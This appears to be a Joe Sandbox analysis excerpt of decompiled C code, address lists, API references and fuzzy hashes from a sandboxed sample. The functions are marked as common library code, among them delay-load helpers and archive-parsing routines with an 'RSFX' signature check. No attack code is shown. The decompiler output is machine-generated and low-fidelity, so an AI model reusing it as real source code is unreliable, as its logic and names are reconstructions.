Instruction Fuzzy Hash: 7BD0A7351042015869243F7C2822F6513C19943B757A00ECEF450F54C3EF2080017111

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDABD Relevance: 3.0, APIs: 2, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E00BBDABD(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0xbd4540 & 0x00001000) == 0) {
					return _t5;
				} else {
					E00BBDB6B(__ecx, __esi);
					_t8 =  *0xbffcd8 + 1;
					 *0xbffcd8 = _t8;
					if(_t8 == 1) {
						E00BBDCBD(4, 0xbffcdc); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0xbdd668; // 0xb57946a0
					_v8 = _t9 ^ _t26;
					if(E00BBDAF0() == 0) {
						 *0xbffcd4 = 0;
					} else {
						 *0xbd2260(0xbffcd4, _t20);
						 *((intOrPtr*)( *0xbffcd0))();
					}
					return E00BBEA8A(_v8 ^ _t24);
				}
			}

0x00bbdabd
0x00bbdabd
0x00bbdac7
0x00bbdaef
0x00bbdac9
0x00bbdac9
0x00bbdad3
0x00bbdad4
0x00bbdadc
0x00bbdae5
0x00bbdae5
0x00bbdd68
0x00bbdd6a
0x00bbdd6b
0x00bbdd72
0x00bbdd7c
0x00bbdd97
0x00bbdd7e
0x00bbdd8c
0x00bbdd92
0x00bbdd94
0x00bbddae
0x00bbddae

APIs

DloadLock.DELAYIMP ref: 00BBDAC9
DloadProtectSection.DELAYIMP ref: 00BBDAE5

Part of subcall function 00BBDCBD: DloadObtainSection.DELAYIMP ref: 00BBDCCD

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 2c09bf042d806f958dea4fa9c3f16d0835f0248b3454921b7094216f89f09448
Instruction ID: 4de8e4f5826882bc73c7ebce25424340a90af2d068bd7aa27a35f0af2e037e78
Opcode Fuzzy Hash: 2c09bf042d806f958dea4fa9c3f16d0835f0248b3454921b7094216f89f09448
Instruction Fuzzy Hash: 1BD0C97010452A8FC265EB58A9C67BD66D0EB14701F6005A5EA66C71E9FFEC8481C609

Uniqueness

Uniqueness Score: -1.00%

Function 00BA12E6 Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BA12E6(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x00ba12ed
0x00ba1302
0x00ba1308

APIs

GetDlgItem.USER32(?,?), ref: 00BA12FB
ShowWindow.USER32(00000000), ref: 00BA1302

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 86f96bd4ddbef5069300100de5b1990ae1523380b7a3aef9b08a8756a1067e46
Instruction ID: 00435d4333bc8f0a1bfb2d654c14d8cf09cd390d6c4c08a2f8f3deb0acc31f0d
Opcode Fuzzy Hash: 86f96bd4ddbef5069300100de5b1990ae1523380b7a3aef9b08a8756a1067e46
Instruction Fuzzy Hash: 72C01232058200BECB010BB0DC09F2FBBACABA8312F0AC908B6A5C0060C23AC010DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00BA19D6 Relevance: 1.8, APIs: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00BA19D6(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t140;
				intOrPtr _t146;
				signed int _t147;
				signed int _t148;
				void* _t151;
				signed int _t156;
				signed int _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t174;
				signed int _t184;
				void* _t185;
				signed int _t187;
				char* _t202;
				intOrPtr _t203;
				signed int _t204;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				char* _t218;
				intOrPtr _t219;
				void* _t220;
				void* _t227;
				void* _t229;

				_t213 = __edx;
				_t174 = __ecx;
				E00BBE0E4(E00BD1AF9, _t229);
				_t172 = _t174;
				_t215 = _t172 + 0x21f8;
				 *((char*)(_t172 + 0x6cbc)) = 0;
				 *((char*)(_t172 + 0x6cc4)) = 0;
				 *0xbd2260(_t215, 7, _t214, _t220, _t171);
				if( *( *( *_t172 + 0xc))() == 7) {
					_t222 = 0;
					 *(_t172 + 0x6cc0) = 0;
					_t103 = E00BA1DD8(_t215, 7);
					__eflags = _t103;
					if(_t103 == 0) {
						E00BA7076(_t229 - 0x38, 0x200000);
						 *(_t229 - 4) = 0;
						 *0xbd2260();
						_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
						 *((intOrPtr*)(_t229 - 0x18)) = _t107;
						 *0xbd2260( *((intOrPtr*)(_t229 - 0x38)),  *((intOrPtr*)(_t229 - 0x34)) + 0xfffffff0);
						_t109 =  *( *_t172 + 0xc)();
						_t184 = _t109;
						_t222 = 0;
						 *(_t229 - 0x14) = _t184;
						__eflags = _t184;
						if(_t184 <= 0) {
							L22:
							__eflags =  *(_t172 + 0x6cc0);
							_t185 = _t229 - 0x38;
							if( *(_t172 + 0x6cc0) != 0) {
								_t35 = _t229 - 4; // executed
								 *_t35 =  *(_t229 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E00BA15D1(_t185); // executed
								L25:
								_t111 =  *(_t172 + 0x6cb0);
								__eflags = _t111 - 4;
								if(__eflags != 0) {
									__eflags = _t111 - 3;
									if(_t111 != 3) {
										 *((intOrPtr*)(_t172 + 0x2200)) = 7;
										L32:
										 *((char*)(_t229 - 0xd)) = 0;
										__eflags = E00BA3A95(_t172, _t213, _t222);
										 *(_t229 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t115 =  *((intOrPtr*)(_t229 - 0xd));
											L39:
											_t187 =  *((intOrPtr*)(_t172 + 0x6cc5));
											__eflags = _t187;
											if(_t187 == 0) {
												L41:
												__eflags =  *((char*)(_t172 + 0x6cc4));
												if( *((char*)(_t172 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t187;
													if(__eflags == 0) {
														E00BA1380(__eflags, 0x1b, _t172 + 0x1e);
													}
													__eflags =  *((char*)(_t229 + 8));
													if( *((char*)(_t229 + 8)) == 0) {
														goto L1;
													} else {
														L46:
														__eflags =  *(_t229 - 0xe);
														 *((char*)(_t172 + 0x6cb6)) =  *((intOrPtr*)(_t172 + 0x2224));
														if( *(_t229 - 0xe) == 0) {
															L68:
															__eflags =  *((char*)(_t172 + 0x6cb5));
															if( *((char*)(_t172 + 0x6cb5)) == 0) {
																L70:
																E00BAFD96(_t172 + 0x6cfa, _t172 + 0x1e, 0x800);
																L71:
																_t116 = 1;
																L72:
																 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
																return _t116;
															}
															__eflags =  *((char*)(_t172 + 0x6cb9));
															if( *((char*)(_t172 + 0x6cb9)) == 0) {
																goto L71;
															}
															goto L70;
														}
														__eflags =  *((char*)(_t172 + 0x21e0));
														if( *((char*)(_t172 + 0x21e0)) == 0) {
															L49:
															 *0xbd2260();
															_t227 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
															_t217 = _t213;
															 *((intOrPtr*)(_t229 - 0x18)) =  *((intOrPtr*)(_t172 + 0x6ca0));
															 *(_t229 - 0x14) =  *(_t172 + 0x6ca4);
															 *((intOrPtr*)(_t229 - 0x1c)) =  *((intOrPtr*)(_t172 + 0x6ca8));
															 *((intOrPtr*)(_t229 - 0x20)) =  *((intOrPtr*)(_t172 + 0x6cac));
															 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t172 + 0x21dc));
															while(1) {
																_t127 = E00BA3A95(_t172, _t213, _t227);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t172 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t172 + 0x6cb5));
																		if( *((char*)(_t172 + 0x6cb5)) == 0) {
																			L65:
																			_t129 = 0;
																			__eflags = 0;
																			L66:
																			 *((char*)(_t172 + 0x6cb9)) = _t129;
																			L67:
																			 *((intOrPtr*)(_t172 + 0x6ca0)) =  *((intOrPtr*)(_t229 - 0x18));
																			 *(_t172 + 0x6ca4) =  *(_t229 - 0x14);
																			 *((intOrPtr*)(_t172 + 0x6ca8)) =  *((intOrPtr*)(_t229 - 0x1c));
																			 *((intOrPtr*)(_t172 + 0x6cac)) =  *((intOrPtr*)(_t229 - 0x20));
																			 *((intOrPtr*)(_t172 + 0x21dc)) =  *((intOrPtr*)(_t229 - 0x24));
																			 *0xbd2260(_t227, _t217, 0);
																			 *( *( *_t172 + 0x10))();
																			goto L68;
																		}
																		__eflags =  *((char*)(_t172 + 0x3318));
																		if( *((char*)(_t172 + 0x3318)) != 0) {
																			goto L65;
																		}
																		_t129 = 1;
																		goto L66;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L67;
																	}
																	L59:
																	E00BA1F0A(_t172);
																	continue;
																}
																__eflags =  *((char*)(_t172 + 0x6cb5));
																if( *((char*)(_t172 + 0x6cb5)) == 0) {
																	L55:
																	_t140 = 0;
																	__eflags = 0;
																	L56:
																	 *((char*)(_t172 + 0x6cb9)) = _t140;
																	goto L59;
																}
																__eflags =  *((char*)(_t172 + 0x5668));
																if( *((char*)(_t172 + 0x5668)) != 0) {
																	goto L55;
																}
																_t140 = 1;
																goto L56;
															}
															goto L67;
														}
														__eflags =  *((char*)(_t172 + 0x6cbc));
														if( *((char*)(_t172 + 0x6cbc)) != 0) {
															goto L68;
														}
														goto L49;
													}
												}
												__eflags = _t115;
												if(_t115 != 0) {
													goto L46;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t229 + 8));
											if( *((char*)(_t229 + 8)) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t229 - 0xd)) = 0;
										while(1) {
											E00BA1F0A(_t172);
											_t146 =  *((intOrPtr*)(_t172 + 0x21dc));
											__eflags = _t146 - 1;
											if(_t146 == 1) {
												break;
											}
											__eflags =  *((char*)(_t172 + 0x21e0));
											if( *((char*)(_t172 + 0x21e0)) == 0) {
												L37:
												_t147 = E00BA3A95(_t172, _t213, _t222);
												__eflags = _t147;
												_t148 = _t147 & 0xffffff00 | _t147 != 0x00000000;
												 *(_t229 - 0xe) = _t148;
												__eflags = _t148 - 1;
												if(_t148 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t146 - 4;
											if(_t146 == 4) {
												break;
											}
											goto L37;
										}
										_t115 = 1;
										goto L39;
									}
									_t218 = _t172 + 0x21ff;
									_t222 =  *( *_t172 + 0xc);
									 *0xbd2260(_t218, 1);
									_t151 =  *( *( *_t172 + 0xc))();
									__eflags = _t151 - 1;
									if(_t151 != 1) {
										goto L1;
									}
									__eflags =  *_t218;
									if( *_t218 != 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t172 + 0x2200)) = 8;
									goto L32;
								}
								E00BA1380(__eflags, 0x3c, _t172 + 0x1e);
								goto L1;
							}
							E00BA15D1(_t185);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t202 =  *((intOrPtr*)(_t229 - 0x38)) + _t222;
							__eflags =  *_t202 - 0x52;
							if( *_t202 != 0x52) {
								goto L17;
							}
							_t156 = E00BA1DD8(_t202, _t109 - _t222);
							__eflags = _t156;
							if(_t156 == 0) {
								L16:
								_t109 =  *(_t229 - 0x14);
								goto L17;
							}
							_t203 =  *((intOrPtr*)(_t229 - 0x18));
							 *(_t172 + 0x6cb0) = _t156;
							__eflags = _t156 - 1;
							if(_t156 != 1) {
								L19:
								_t204 = _t203 + _t222;
								 *(_t172 + 0x6cc0) = _t204;
								_t222 =  *( *_t172 + 0x10);
								 *0xbd2260(_t204, 0, 0);
								 *( *( *_t172 + 0x10))();
								_t160 =  *(_t172 + 0x6cb0);
								__eflags = _t160 - 2;
								if(_t160 == 2) {
									L21:
									_t222 =  *( *_t172 + 0xc);
									 *0xbd2260(_t215, 7);
									 *( *( *_t172 + 0xc))();
									goto L22;
								}
								__eflags = _t160 - 3;
								if(_t160 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t222;
							if(_t222 <= 0) {
								goto L19;
							}
							__eflags = _t203 - 0x1c;
							if(_t203 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t229 - 0x14) - 0x1f;
							if( *(_t229 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t165 =  *((intOrPtr*)(_t229 - 0x38)) - _t203;
							__eflags =  *((char*)(_t165 + 0x1c)) - 0x52;
							if( *((char*)(_t165 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1d)) - 0x53;
							if( *((char*)(_t165 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1e)) - 0x46;
							if( *((char*)(_t165 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1f)) - 0x58;
							if( *((char*)(_t165 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t222 = _t222 + 1;
							__eflags = _t222 - _t109;
						} while (_t222 < _t109);
						goto L22;
					}
					 *(_t172 + 0x6cb0) = _t103;
					__eflags = _t103 - 1;
					if(_t103 == 1) {
						_t219 =  *_t172;
						_t222 =  *(_t219 + 0x14);
						 *0xbd2260(0);
						_t167 =  *( *(_t219 + 0x14))();
						asm("sbb edx, 0x0");
						 *0xbd2260(_t167 - 7, _t213);
						 *((intOrPtr*)(_t219 + 0x10))();
					}
					goto L25;
				}
				L1:
				_t116 = 0;
				goto L72;
			}

0x00ba19d6
0x00ba19d6
0x00ba19db
0x00ba19e4
0x00ba19ec
0x00ba19f3
0x00ba19fa
0x00ba1a06
0x00ba1a13
0x00ba1a1e
0x00ba1a21
0x00ba1a27
0x00ba1a2c
0x00ba1a2e
0x00ba1a74
0x00ba1a7b
0x00ba1a83
0x00ba1a8b
0x00ba1a99
0x00ba1a9f
0x00ba1aa7
0x00ba1aaa
0x00ba1aac
0x00ba1aae
0x00ba1ab1
0x00ba1ab3
0x00ba1b56
0x00ba1b56
0x00ba1b5d
0x00ba1b60
0x00ba1b6c
0x00ba1b6c
0x00ba1b6c
0x00ba1b70
0x00ba1b75
0x00ba1b75
0x00ba1b7b
0x00ba1b7e
0x00ba1b90
0x00ba1b93
0x00ba1bcd
0x00ba1bd7
0x00ba1bdb
0x00ba1be3
0x00ba1be8
0x00ba1beb
0x00ba1bed
0x00ba1c2f
0x00ba1c2f
0x00ba1c32
0x00ba1c32
0x00ba1c38
0x00ba1c3a
0x00ba1c46
0x00ba1c46
0x00ba1c4d
0x00ba1c53
0x00ba1c53
0x00ba1c55
0x00ba1c5d
0x00ba1c5d
0x00ba1c62
0x00ba1c66
0x00000000
0x00ba1c6c
0x00ba1c6c
0x00ba1c6c
0x00ba1c76
0x00ba1c7c
0x00ba1d8e
0x00ba1d8e
0x00ba1d95
0x00ba1da0
0x00ba1db0
0x00ba1db5
0x00ba1db5
0x00ba1db7
0x00ba1dbd
0x00ba1dc7
0x00ba1dc7
0x00ba1d97
0x00ba1d9e
0x00000000
0x00000000
0x00000000
0x00ba1d9e
0x00ba1c82
0x00ba1c89
0x00ba1c98
0x00ba1c9f
0x00ba1ca9
0x00ba1cab
0x00ba1cb3
0x00ba1cbc
0x00ba1cc5
0x00ba1cce
0x00ba1cd7
0x00ba1d20
0x00ba1d22
0x00ba1d27
0x00ba1d29
0x00000000
0x00000000
0x00ba1ce3
0x00ba1ce9
0x00ba1cec
0x00ba1d0f
0x00ba1d12
0x00ba1d2d
0x00ba1d34
0x00ba1d44
0x00ba1d44
0x00ba1d44
0x00ba1d46
0x00ba1d46
0x00ba1d4c
0x00ba1d4f
0x00ba1d58
0x00ba1d61
0x00ba1d6a
0x00ba1d73
0x00ba1d84
0x00ba1d8c
0x00000000
0x00ba1d8c
0x00ba1d36
0x00ba1d3d
0x00000000
0x00000000
0x00ba1d41
0x00000000
0x00ba1d41
0x00ba1d14
0x00ba1d17
0x00000000
0x00000000
0x00ba1d19
0x00ba1d1b
0x00000000
0x00ba1d1b
0x00ba1cee
0x00ba1cf5
0x00ba1d05
0x00ba1d05
0x00ba1d05
0x00ba1d07
0x00ba1d07
0x00000000
0x00ba1d07
0x00ba1cf7
0x00ba1cfe
0x00000000
0x00000000
0x00ba1d02
0x00000000
0x00ba1d02
0x00000000
0x00ba1d2b
0x00ba1c8b
0x00ba1c92
0x00000000
0x00000000
0x00000000
0x00ba1c92
0x00ba1c66
0x00ba1c4f
0x00ba1c51
0x00000000
0x00000000
0x00000000
0x00ba1c51
0x00ba1c3c
0x00ba1c40
0x00000000
0x00000000
0x00000000
0x00ba1c40
0x00ba1bef
0x00ba1bf1
0x00ba1bf4
0x00ba1bf6
0x00ba1bfb
0x00ba1c01
0x00ba1c04
0x00000000
0x00000000
0x00ba1c0a
0x00ba1c11
0x00ba1c1c
0x00ba1c1e
0x00ba1c23
0x00ba1c25
0x00ba1c28
0x00ba1c2b
0x00ba1c2d
0x00000000
0x00000000
0x00000000
0x00ba1c2d
0x00ba1c13
0x00ba1c16
0x00000000
0x00000000
0x00000000
0x00ba1c16
0x00ba1cdc
0x00000000
0x00ba1cdc
0x00ba1b97
0x00ba1ba0
0x00ba1ba5
0x00ba1bad
0x00ba1baf
0x00ba1bb2
0x00000000
0x00000000
0x00ba1bb8
0x00ba1bbb
0x00000000
0x00000000
0x00ba1bc1
0x00000000
0x00ba1bc1
0x00ba1b86
0x00000000
0x00ba1b86
0x00ba1b62
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba1ab9
0x00ba1ab9
0x00ba1abc
0x00ba1abe
0x00ba1ac1
0x00000000
0x00000000
0x00ba1ac7
0x00ba1acc
0x00ba1ace
0x00ba1b0a
0x00ba1b0a
0x00000000
0x00ba1b0a
0x00ba1ad0
0x00ba1ad3
0x00ba1ad9
0x00ba1adc
0x00ba1b14
0x00ba1b16
0x00ba1b1c
0x00ba1b22
0x00ba1b28
0x00ba1b30
0x00ba1b32
0x00ba1b38
0x00ba1b3b
0x00ba1b42
0x00ba1b47
0x00ba1b4c
0x00ba1b54
0x00000000
0x00ba1b54
0x00ba1b3d
0x00ba1b40
0x00000000
0x00000000
0x00000000
0x00ba1b40
0x00ba1ade
0x00ba1ae0
0x00000000
0x00000000
0x00ba1ae2
0x00ba1ae5
0x00000000
0x00000000
0x00ba1ae7
0x00ba1aeb
0x00000000
0x00000000
0x00ba1af0
0x00ba1af2
0x00ba1af6
0x00000000
0x00000000
0x00ba1af8
0x00ba1afc
0x00000000
0x00000000
0x00ba1afe
0x00ba1b02
0x00000000
0x00000000
0x00ba1b04
0x00ba1b08
0x00000000
0x00000000
0x00000000
0x00ba1b0d
0x00ba1b0d
0x00ba1b0e
0x00ba1b0e
0x00000000
0x00ba1b12
0x00ba1a30
0x00ba1a36
0x00ba1a39
0x00ba1a3f
0x00ba1a42
0x00ba1a47
0x00ba1a4f
0x00ba1a57
0x00ba1a5c
0x00ba1a64
0x00ba1a64
0x00000000
0x00ba1a39
0x00ba1a15
0x00ba1a15
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00BA19DB

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 80940f563b0f892d661cbc429f25230b97b5c41a76401fc1ff86492888020f75
Instruction ID: 06bbb3197afad62755157e737f8baca745d1d5b1d762a43f2e1d7a494e881093
Opcode Fuzzy Hash: 80940f563b0f892d661cbc429f25230b97b5c41a76401fc1ff86492888020f75
Instruction Fuzzy Hash: D5C16C30A082549FDF55CF6CC494BA97BE5EB17310F0848FAEC86AF286DB359944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA3B26 Relevance: 1.7, APIs: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00BA3B26(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E00BBE0E4(E00BD1B56, _t153);
				E00BBE1C0();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00BA1380(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E00BAC866(_t83, _t120);
						_push(_t120);
						E00BB17D6(_t153 - 0xe6ec, __eflags); // executed
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00BB2BB2(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E00BAA9C8(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E00BAC919(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E00BB2861(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E00BA9283(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E00BAA996(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00BA7032(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E00BA6F5B(0xbdff50, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00BAFEA0(_t148);
									}
								}
								L25:
								E00BB1A2F(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E00BAC8D1(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00BA2020(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E00BAC936(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00BA1380(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E00BA1380(_t156, 0x1d, _t151 + 0x1e);
					E00BA6F5B(0xbdff50, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x00ba3b26
0x00ba3b26
0x00ba3b2b
0x00ba3b35
0x00ba3b3b
0x00ba3b3d
0x00ba3b44
0x00ba3b62
0x00ba3b69
0x00ba3dab
0x00ba3db1
0x00000000
0x00ba3db1
0x00ba3b71
0x00ba3b82
0x00ba3b88
0x00000000
0x00000000
0x00ba3b94
0x00ba3b94
0x00ba3b9a
0x00ba3bab
0x00ba3bac
0x00ba3bb5
0x00ba3bba
0x00ba3bc1
0x00ba3bc6
0x00ba3bd5
0x00ba3bd8
0x00ba3bdd
0x00ba3be0
0x00ba3be3
0x00ba3c38
0x00ba3c38
0x00ba3c3e
0x00ba3c9a
0x00ba3ca8
0x00ba3cbc
0x00ba3cc9
